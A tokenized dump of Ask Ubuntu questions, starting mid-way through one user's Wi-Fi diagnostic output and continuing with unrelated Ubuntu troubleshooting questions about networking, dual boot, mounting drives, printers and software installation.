wpa2 encryption : yes wireless access points davidgamal : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 62 wpa a7a : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 60 wpa nadousha : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 60 wpa essam : infra , < mac address removed > , freq 2452 mhz , rate 54 mb/s , strength 59 wpa magdy : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 59 wpa linksys : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 59 wpa elguindy : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 59 wpa netgear : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 57 wpa fakhry : infra , < mac address removed > , freq 2427 mhz , rate 54 mb/s , strength 54 wpa wpa2 apad : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 42 wpa vodafone_adsl_4810 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 57 wep vodafone_adsl_93a0 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 42 wep eseed : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 62 wpa wpa2 m & n : infra , < mac address removed > , freq 2457 mhz , rate 54 mb/s , strength 59 wpa zeyad : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 60 wpa - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.70 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** auto lo iface lo inet loopback ***** iwlist ***** wlan0 scan completed : cell 01 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=48/70 signal level=-62 dbm encryption key : on essid : '' apad '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000022f4e6cd0c extra : last beacon : 780ms ago ie : unknown : 000461706164 ie : unknown : 010482848b96 ie : unknown : 030101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : 050400010000 ie : unknown : 2a0104 ie : unknown : 32080c1218243048606c cell 02 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' eseed '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 12 mb/s ; 24 mb/s ; 36 mb/s bit rates:9 mb/s ; 18 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000000642ee3c2 extra : last beacon : 408ms ago ie : unknown : 00056553454544 ie : unknown : 010882848b960c183048 ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 32041224606c ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk preauthentication supported ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd0900037f01010008ff7f ie : unknown : dd1a00037f0301000000f8d1119777bffad1119777bf64002c010808 cell 03 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' davidgamal '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000101f028d1bc extra : last beacon : 344ms ago ie : unknown : 000a646176696467616d616c ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : 050400010000 ie : unknown : 2a0104 ie : unknown : 32043048606c cell 04 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' a7a '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000008aa0f251bc extra : last beacon : 452ms ago ie : unknown : 0003613761 ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : 050400010000 ie : unknown : 2a0104 ie : unknown : 32043048606c cell 05 - address : < mac address removed > channel:9 frequency:2.452 ghz ( channel 9 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' essam '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=000000249105e187 extra : last beacon : 188ms ago ie : unknown : 0005657373616d ie : unknown : 010882848b961224486c ie : unknown : 030109 ie : unknown : 2a0104 ie : unknown : 32040c183060 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : dd07000c4304000000 ie : unknown : 0706545700010b10 cell 06 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' magdy '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000000b1227c14f extra : last beacon : 68ms ago ie : unknown : 00054d61676479 ie : unknown : 010882848b961224486c ie : unknown : 03010b ie : unknown : 2a0106 ie : unknown : 32048c98b060 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : dd07000c4304000000 ie : unknown : 0706555300010b10 cell 07 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' linksys '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000001e01018156 extra : last beacon : 52ms ago ie : unknown : 00076c696e6b737973 ie : unknown : 010482848b96 ie : unknown : 03010b ie : unknown : 2a0103 ie : unknown : 32088c129824b048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk cell 08 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=49/70 signal level=-61 dbm encryption key : on essid : '' netgear '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000011860c20186 extra : last beacon : 140ms ago ie : unknown : 00074e455447454152 ie : unknown : 010882848b962430486c ie : unknown : 03010b ie : unknown : 2a0102 ie : unknown : 2f0102 ie : unknown : 32040c121860 ie : unknown : dd060010180202f4 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk cell 09 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=48/70 signal level=-62 dbm encryption key : on essid : '' zeyad '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000c022279cd extra : last beacon : 808ms ago ie : unknown : 00057a65796164 ie : unknown : 010482848b96 ie : unknown : 030101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : 050400010002 ie : unknown : 2a0104 ie : unknown : 32080c1218243048606c cell 10 - address : < mac address removed > channel:4 frequency:2.427 ghz ( channel 4 ) quality=48/70 signal level=-62 dbm encryption key : on essid : '' fakhry '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=00000038b98ba304 extra : last beacon : 544ms ago ie : unknown : 000666616b687279 ie : unknown : 010882848b961224486c ie : unknown : 030104 ie : unknown : 32040c183060 ie : unknown : 0706545700010b14 ie : unknown : 33082001020304050607 ie : unknown : 33082105060708090a0b ie : unknown : 050400010002 ie : unknown : 2a0104 ie : unknown : 2d1a6e1117ff000000010000000000000000000000000c0000000000 ie : unknown : 3d1604000400000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : dd07000c4304000000 ***** resolv.conf ***** nameserver 127.0.0.1 search lan ***** blacklist ***** [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist-bcm43.conf ] blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac ***** modinfo ***** filename : /lib/modules/3.2.0-53-generic-pae/updates/dkms/wl.ko license : mixed/proprietary srcversion : 620417839200a53ff5c4ab5 alias : pci : v*d*sv*sd*bc02sc80i* depends : cfg80211 , lib80211 vermagic : 3.2.0-53-generic-pae smp mod_unload modversions 686 parm : oneonly : int parm : piomode : int parm : instance_base : int parm : nompc : int parm : intf_name : string filename : /lib/modules/3.2.0-53-generic-pae/kernel/drivers/net/wireless/rtlwifi/rtl8192se/rtl8192se.ko firmware : rtlwifi/rtl8192sefw.bin description : realtek 8192s/8191s 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : dbf9bfec2956537d0afada5 alias : pci : v000010ecd00008174sv*sd*bc*sc*i* alias : pci : v000010ecd00008173sv*sd*bc*sc*i* alias : pci : v000010ecd00008172sv*sd*bc*sc*i* alias : pci : v000010ecd00008171sv*sd*bc*sc*i* alias : pci : v000010ecd00008192sv*sd*bc*sc*i* depends : rtlwifi , mac80211 intree : y vermagic : 3.2.0-53-generic-pae smp mod_unload modversions 686 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.2.0-53-generic-pae/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 39ac859a4e18fe3af485a4d depends : mac80211 , cfg80211 intree : y vermagic : 3.2.0-53-generic-pae smp mod_unload modversions 686 ***** udev rules ***** # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:19.0 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:03:00.0 ( rtl8192se ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' ***** dmesg ***** [ 19.933281 ] rtl8192se 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 19.933341 ] rtl8192se 0000:03:00.0 : setting latency timer to 64 [ 19.956722 ] rtl8192se : rtl8192ce : fw power save off ( module option ) [ 19.977495 ] rtl8192se : driver for realtek rtl8192se/rtl8191se [ 19.977497 ] loading firmware rtlwifi/rtl8192sefw.bin [ 20.285621 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 20.288384 ] wl : module license 'mixed/proprietary ' taints kernel . [ 21.201041 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 21.201472 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 25.727929 ] wlan0 : authenticate with < mac address removed > ( try 1 ) [ 25.729536 ] wlan0 : authenticated [ 25.749427 ] wlan0 : associate with < mac address removed > ( try 1 ) [ 25.751323 ] wlan0 : deauthenticated from < mac address removed > ( reason : 6 ) [ 27.847644 ] ibm trackpoint firmware : 0x0e , buttons : 3/3 ****************** done ****************** i know there is a lot of threads around this problem , but i have tried a lot of solutions and nothing works . thanks
345032	losing connection with weird behavior	my game client loses connection from my game server intermittently . ( about 0.2 % per minute ) when connection is dropped , my client received a error code 10053 ( connaborted ) usually . the number of user is about 100k , so about 200 users are dropped per minute . i should find the cause , but ca n't find the root cause . now i have written code to work aroud this problem . when my client detects losing connection , my client tries to connect again . although this work around , i want to know the root cause of this problem . here is my game c/s 's environment . client works on windows ( xp , visita , 7 ) uses in-house network library ( it 's very simple ) server works on linux ( ubuntu 12.04.1 - kernel 3.2.0-29 / ubuntu 12.04.2 - kernel 3.5.0-23 ) using iptables or ufw here is my approach to solve this problem . first of all , i doubted my in-house code . i reviewed my codes very carefully but could n't find any problems . second , i tried to capture packets on my server . before loosing connection , my server ca n't receve any packets from a client . my server ca n't receive a ack packet , so my server try retransmission again and again . maybe a client also ca n't receive any packets from a server . ( i ca n't reproduce this problem in my computer , so ca n't capture packets in client 's side . ) the reason i think a client ca n't receive any packets is that a client is disconnected with a 10053 error code before the server 's retransmission timeout . the client does n't call closesocket explicitly . i wonder why client and server ca n't receive any packets ? what 's wrong ? if the reason is congestion , trying reconnect should be fail , is n't it ? but almost trying reconnect is success ! i do n't know who drops my packets and why ? i suspect the firewall , so i make the firewall disable on the server ( just one machine ) . but , the problem still produces . finally , i suspect linux kernel/tcp stack or nic device driver . but commonsensically the linux kernel/tcp stack is very stable , is n't it ? do you have any idea ? i 'll be very appreciate any feedback . ** attach my wireshark 's result port : 4134 is a client port : 7781 is a server a client should send a ping msg ( which size is 20 bytes ) to a server per 3 seconds . but , there is no client 's ping msg from 768 to 786 a server sends a ping msg per 20 seconds . at 786 a server try to send a ping msg . ( which size is 30 bytes ) but a server ca n't receive ack packet from a client . at 815 , a client tries to reconnect to server ! ! ( it 's my work around . ) but , a server ca n't receive any fin or rst . maybe a client had sent a rst to a server , but a server ca n't receive it . ** i ca n't attach a image because i do n't have 10 reputation : (
345037	the sound device is not available in some applications simultaneously	i install ubuntu 13.04 , all work well . then i install kubuntu-desktop , and all worked well . next i uninstall ubuntu-destop , and all worked well . after that , i wiped all data and install clean kubuntu 13.04 , and now i have the following issues : sound card unavailable from some application in same time . for example , i ca n't use skype + dota 2 , but i can use audacious + chrome + flash + vlc simultaneously . if i run skype , it can use microphone and headphones , but after that i run dota 2 and have no sound in dota . if i run dota 2 , it can use microphone and headphone , but after that i run skype and it have no sound in skype . ( in devices , skype ca n't see my audio hardware , that used by dota 2 ) in ubuntu all work like a charm , also after installed kubuntu-desktop and uninstall ubuntu-desktop , all work well . p.s . : sorry for my bad english .
345039	how do i mount another ntfs partition of an external hard drive running ubuntu ?	i have an external hard drive with the following partitions . i am running ubuntu 13.04 ( raring ringtail ) on the same ext . hard drive and am unable to mount the ntfs partition on this drive . could someone help please ? here 's the output of the fdisk -l command : disk /dev/sdf : 1000.2 gb , 1000204885504 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002e048 device boot start end blocks id system /dev/sdf1 * 2046 716802047 358400001 5 extended /dev/sdf2 716802048 1953519615 618358784 7 hpfs/ntfs/exfat /dev/sdf5 2048 708788223 354393088 83 linux /dev/sdf6 708790272 716802047 4005888 82 linux swap / solaris i have tried mounting it using the mount command with admin privileges as listed here : https : //help.ubuntu.com/community/mount/usb . the output is listed below : command : mount -t ntfs-3g /dev/sdf2 /media/disk1/ output : ntfs signature is missing . failed to mount '/dev/sdf2 ' : invalid argument the device '/dev/sdf2 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? however on windows 7 the ntfs partition of this drive mounts perfectly well .
345044	how to append diffrence in a file to another file	i am a forgetful person so i use every kind of backup utility . one of them is clipit , it stores upto 1000 item but i do n't want to lose items that exceed the limit . i thought i can use diff tool and append new items to another file every day but i do n't know how to do that . would any smart guy help me please ?
345045	take screenshots at random intervals with python ?	i am working on a project to take screenshots of desktop and upload images to a server i want to develop a python app , when user starts that app it will start taking screenshots in random interval like between 2-5 min of interval i have the code that will take screenshot and i have tested it on ubuntu it is working properly . code to capture screenshot import gtk.gdk import time w = gtk.gdk.get_default_root_window ( ) sz = w.get_size ( ) print `` the size of the window is % d x % d '' % sz pb = gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , false,8 , sz [ 0 ] , sz [ 1 ] ) pb = pb.get_from_drawable ( w , w.get_colormap ( ) ,0,0,0,0 , sz [ 0 ] , sz [ 1 ] ) ts = time.time ( ) filename = `` screenshot '' filename += str ( ts ) filename += `` .png '' if ( pb ! = none ) : pb.save ( filename , '' png '' ) print `` screenshot saved to `` +filename else : print `` unable to get the screenshot . '' i want to run this code in random interval of 2-5 min how can i develop a script that will run this code in thread .
345046	installed qt as sudo su , unable to launch ide	i installed qt 5.1 by the following commands in ubuntu 12.04.3 sudo su cd /qtsdk -- linux-.run chmod +x qtsdk -- linux-.run chown root : root qtsdk -- linux-.run ./qtsdk -- linux-.run after installation , the default launch opened the ide . at that time , i locked the shortcut to launcher . later after closing the ide , if i click on shortcut on the launcher , the ide is not getting launched . it 's installed in /opt/qt_5.1 directory . and if i 'm unable to traverse to /opt/qt_5.1/gcc/examples as a normal user . i 'm the only user & it 's my personal machine . how do i make qt ide launch on click of icon on launcher . or if my installation procedure is wrong , how do i uninstall & install it properly . kindly help me . note : i followed the installation procedure in the following link . http : //tutorialforlinux.com/2013/05/linux-xubuntu-raring-i386-howto-install-gettingstarted-latest-qt-sdk/
345047	problems with windows 8/ubuntu 13.04 dualboot surface pro	i 've been having this problem this whole day and it 's been killing me ... i 'm following dual boot surface pro with ubuntu ? this guide to dual boot my microsoft surface pro with ubuntu 13.04 . the main problem i have is that the wifi does n't work and i do not have a ethernet port on this device . i get to the point in the guide where he installs boot-repair , the problem is that he downloads it off the internet ... which i have no access too . just so you know , i am have ubuntu on my device installed under a partition . i did the try and install ubuntu option , installed it and now i 'm `` continuing testing '' , simply just trying to get grub2 to work , so i can switch between partitions . wifi would be a plus too , but that should n't be difficult once i get this out of the way . so i 've tried a few things ... i downloaded the tar.gz of boot-repair on my other partition and grabbed it from there . there is absolutely no documentation that tells me how to manually compile it , so i got stuck there . i tried to do step 7 on the tutorial , download the two .deb files and get them on to this os from my windows partition and manually install them using the `` sudo dpkg -i package.deb '' command . the .deb 's installed by my internet still is n't working . even when i double click them so i can use the ubuntu software center , the install button is just grayed out . i tried using easybcd on my window partition to set up a way to access my ubuntu partition from boot up but i just get a wbm error and then windows 8 boots after . i just want to get grub2 working so i can actually tackle this wifi issue without constantly having to boot off this annoying flash drive . is there anyone i can get grub2 or any way to switch between partitions working without wifi ? i appreciate all the help , after a few beers and about 8 hours of working on this straight i 'm about to throw my surface out the window . cheers .
345048	ubuntu 12.04lts software updating error	i am trying to update ubuntu 12.04lts in my laptop , when i click on software up to date i get an error message e : encountered a section with no package : header , e : problem with merge list/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_quantal_man_binary-and64_package , e : the package lists or status file could not be passed or opened
345053	partitioning in dual boot of ubuntu and windows 7	i have hp pavilion laptop with 640 gb hdd , and have 4 drives c , d , e , f . i have installed windows 7 in c drive and now want to try ubuntu in dual boot . can i install ubuntu in same c drive in which windows 7 is installed ? or i 'll need to install ubuntu in some other drive . please help .
345054	script not running at startup	i 'm an ubuntu 13.04 user and i 'm trying to run a script at startup . i created it in /etc/init.d/ , gave it chmod 755 and ran the update-rc.d < your script > defaults command . the script is remapping my mouse 's keybindings and contains the following : # ! /bin/sh xinput set-button-map 10 1 2 3 4 5 6 7 9 8 it runs correctly if i do it manually , but i want it to run with startup .
345055	how to use cgroup in ubuntu 13.04	i 'm trying to learn how cgroup works on ubuntu and seems that cgroup does n't work in ubuntu 13.04 . i am using the answer to this question how to set cpu limit for given process permanently . cpulimit and nice do n't work these are what i 've done : installed cgroup : sudo apt-get install cgroup-bin reboot make a cgroup for your user ( the owner of the process ) : sudo cgcreate -a ipeacocks -g cpu : ipeacocks ran the command : echo 100 > /sys/fs/cgroup/cpu/ipeacocks/cpu.shares and the command : cgexec -g cpu : ipeacocks stress -- cpu 4 and output : cgroup change of group failed why ? what i am doing wrong ?
345059	why is the official ubuntu website only in english , when ubuntu strives for being a multilingual os ?	for canonical/ubuntu it is important to provide their software in as many languages as possible . then , why does n't canonical offer an official website in different languages ? ( as far as i know the official website www.ubuntu.com is only in english ) .
345071	is it possible to apply a theme partially ?	is there a way to apply one theme on nautilus and another to apps ? i am using malys-deda , it looks great on nautilus but in thunderbird it is hard to read emails .
345072	some qlabel are not getting translated when app is run in other language ?	i am running kde app kstars on my kubuntu 13.04 system from terminal using following command kde_lang=fr ./kstars some labels file from http : //paste.kde.org/p6e42cd0d/ are not getting translated for example : scopeselectlabel , modellabel , aperturelabel etc while others are correctly getting translated on same window . can you please help me understand what is reason for the same and how can i make sure each elements of widget get translated in language in which app is being run .
345076	i lose keyboard and mouse focus during installation onto virtualbox ?	i ca n't do any of the suggested solutions i have found to correct this problem , as i can not even finish the install . i am trying to install ubuntu 12.0.4 on virtualbox . had success once , and have performed the install at least a dozen times in past 36 hours , but once in terminal , i lose focus again . can anyone help me sort this out please ?
345077	impossible to format a 4gb raw usb flash drive	i have 4gb usb flashdrive i tried to format with widows 7 and could n't format it any way i tried with kali linux ( a pentesting debian distro ) to format my raw usb flash drive ( as detected on windows 7 ) when i try to format it with gparted to fat32 it says input/outpout error during write on dev/sdf i did retry but it took a very very long time trying to format so i aborted the operation than i tried dd if=/dev/sdf1 of=~/flashdrive.img but this dd : reading `/dev/sdf1 ' : input/output error 12776+0 records in 12776+0 records out 6541312 bytes ( 6.5 mb ) copied , 649.385 s , 10.1 kb/s please how to fix the flashdrive ? thank you very much
345079	ubuntu for phone	i saw there is fully compatibility when installing ubuntu onto a nexus phone . i wanted to know if it will work also on a motorola razr ? thanks !
345082	unabe to install windows on a ubuntu only machine	i am new here and this is my first post . i have an hp laptop ( pavilion dv6000 ) while i was trying to dual boot ubuntu , i was unable to install it correctly and the setup broke in the middle leaving me unable to boot . next i tried to install other linux os 's but with out any luck . finally i was able to install ubuntu 12.10 by following the guides on the internet , but it is extreme slow and not all hardware works . i was able to install it in a 80gib ext4 partition where ubuntu is installed and no other windows partitions and , now if i use the windows 7/8 livecd or usb then , through the bios , set it to boot using usb or cd . it still does n't boot giving a error : an operating system was n't found this maybe because it does n't have a windows 8 master boot record . please can anybody tell me how to restore windows 8mbr and boot into the windows installation disc , and get rid of ubuntu ? i already have it on my desktop computer , so it 's not needed on my laptop . please help as i have to complete some important work .
345083	how do i disable automatic remote printer installation ?	in raring , everytime i connect to the network , cups installs all the printers in the network automatically . furthermore , some printers have been added more than once . furthermore , i connect a usb printer to the laptop every now and then . even though the printer is configured already , another printer is added to the list . i wish to disable this feature and allow only manual installation of printers . how do i go about it ?
345084	cursor is not changing when hovers on links while browsing in kubuntu 13.04	tested it in chrome and firefox - the cursor completely ignores the css cursor property on all sites , for example , on hovering over a link it appear as regular arrow . i am using the default kde cursor theme ( oxygen ) . how can i fix this ?
345087	how do i add a network drive to plex ?	so i 've been looking around and ca n't find an exact solution to my problem . i dual boot windows 7 and ubuntu 13.04 . i like ubuntu and want to use it instead of windows . everything was working on ubuntu 13.04 running pms and a external usb hdd hooked up to it until i got a nas wd mybooklive 3tb drive . so i understand with this there are shared folders on this drive . i created a folder called plex which then has sub-directories : '' mybook '' is the name of the drive mybook/plex/movies mybook/plex/tv shows i do n't know how to mount/map this properly to keep this mounted every time there is a reboot needed . also i just do n't understand how to add it into plex . i know this will be fixed when the shared folder `` plex '' is mounted/mapped correctly . i just ca n't get plex to see it . there is n't a username or password needed to get into the shared folder `` plex '' . so credentials are n't needed . ip address of the mybook is 192.168.0.13 . i have read various things and tried several different things , but no luck . if someone could help me i would be grateful . the drive is nfs and samba compatible .
345089	installing ubuntu on a new harddrive next to windows 7 on ssd and raid 0 configurated drives	i want to install ubuntu on a new harddrive next to windows 7 ( which is on some other drive ) . here 's my layout ( click for full-size image , description below ) disk 0 : a ssd with windows 7 on it disk 1 : actually 2 physical hdd 's each 500 gb in raid 0 disk 2 : the new hard drive i installed ubuntu on ( or so i think ) . i added in red what each partition is . disk 3 : the usb stick for installing ubuntu i have been busy all morning trying to get this to work , tried many things that people said on here or somewhere else on the web . it just wo n't work : ( basically everytime i try to install it in any way possible , grub messes up and goes into the grub rescue mode . i have tried to use boot-repair . i can only get my windows bootloader back using this ( or using the windows 7 dvd ) , but i just ca n't get ubuntu to start . windows does n't want to recognize that i have ubuntu installed either . basically i boot my bios into disk 0 . right now , windows boots up normally , without any os list or whatever . if i try to boot up into any of the other disks except the usb drive or dvd drive , i get the grub rescue screen ... the boot info summary from boot-repair is at : http : //paste.ubuntu.com/6102240/ any tips or hints ? thanks in advance .
345094	bind9 and external domain	i need a little help concerning the configuration of bind 9 in ubuntu server 12.04.2 . we have a domain company.com with an external registrar . with this , we can manage all dns settings for the website ( www.company.com ) which is in a vps on the internet . now we need to also have the crm application ( crm.company.com ) accessible from the internet . however , crm is on a linux server in our lan , different from the one using bind 9 . how can i configure my bind to manage the crm.company.com request and forward it to the correct server ? edit - based on addtional help from mr. douggro i try to explain better my it structure concernig mr. douggro suggestion : public registrar = > manage dns entry for company.com intermediate srv = > my server with bind9 , iptbales , eth0 on wan , eth1 on lan ( 10.1.1.120 ) web srv = > my server with apache , mysql , php5 eth0 on lan ( 10.1.1.122 ) where crm run
345099	how to remove integration with ubuntu online accounts ?	how to remove integration with ubuntu online accounts ? when i try remove this junk in gnome synaptic try remove evolution empathy ...
345103	windows 7 partition not showing on ubuntu 13.04	i use ubuntu 13.04 on a dual boot with windows 7 . i could see the windows partition until i did a hard reset because the computer froze . i read about using a manual mount , however the blkid just does n't do anything , and never shows any output . source : https : //help.ubuntu.com/community/mountingwindowspartitions both systems are bootable however and the filesystems seem to be fine .
345104	how to connect to a wlan printer ?	my printer ( canon pixma 5250 ) has usb & wlan interfaces . it works well via direct usb connection from my desktop pc , and also from a windows laptop that connects via wlan . i would like to switch this laptop to ubuntu but i do n't see how i can make ubuntu connect to the wireless printer ? this is my wife 's laptop . seeing how easilyl it works in windows , i ca n't ask her to connect a wire to print from ubuntu . fwiw , in windows the option `` add printer '' automatically discovers the printer on the wlan and successfully installs drivers for it . i do n't know whether such user-friendly functionality exists in ubuntu but i am hoping that is the case -- i just have n't found this anywhere ? i 've tried ( a year ago ) to set up ubuntu on her laptop , and i had the printer set up using samba and/or cups and it was pretty difficult to set up , and the printed result was not the expected wysiwyg . this similar question has an answer indicating that the `` add printer '' dialog can `` find '' the printer , but when i try that , i get the message no printer was found at that address . apparently i must enter a host but what could that be ? so how can i `` find '' a wireless printer ?
345106	how can i install software wihout the ubuntu software center ?	how can i install gnome dictionary or other software if my ubuntu software center is not working ? please give me explanation why my software center is not working and how to fix it .
345107	how to save applications for re-install or upgrade ?	i keep experimenting with my ubuntu so i have to reinstall it sometimes . i just wanted to know whether i can create another partition only for my installed application ( from software center ) so that i can modify my system but have the application folders ( i guess /var/cache/apt and /usr/bin ) be safe and i can again use the applications after a reinstall or upgrade ? note : i already have a different partition for my /home folder .
